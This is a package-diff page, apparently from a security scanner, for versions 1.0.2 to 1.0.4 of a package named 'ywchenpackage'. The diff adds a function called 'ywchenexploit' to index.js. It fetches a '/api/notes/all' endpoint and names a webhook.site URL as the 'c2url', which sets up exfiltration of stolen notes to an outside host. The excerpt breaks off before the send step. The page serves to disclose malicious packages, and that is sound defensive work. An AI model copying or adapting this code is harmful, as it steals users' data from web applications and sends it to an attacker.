ywchenpackage 1.0.2 → 1.0.4
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +2 -2
- package/package.json +1 -1
package/index.js
CHANGED
@@ -1,6 +1,6 @@
|
|
1
1
|
function ywchenexploit() {
|
2
|
-
let stolenurl =
|
3
|
-
let c2url =
|
2
|
+
let stolenurl = "/api/notes/all";
|
3
|
+
let c2url = "https://webhook.site/21b9dee7-20fa-4f87-8591-610784ad1f2e";
|
4
4
|
fetch(stolenurl)
|
5
5
|
.then(
|
6
6
|
function(response){
|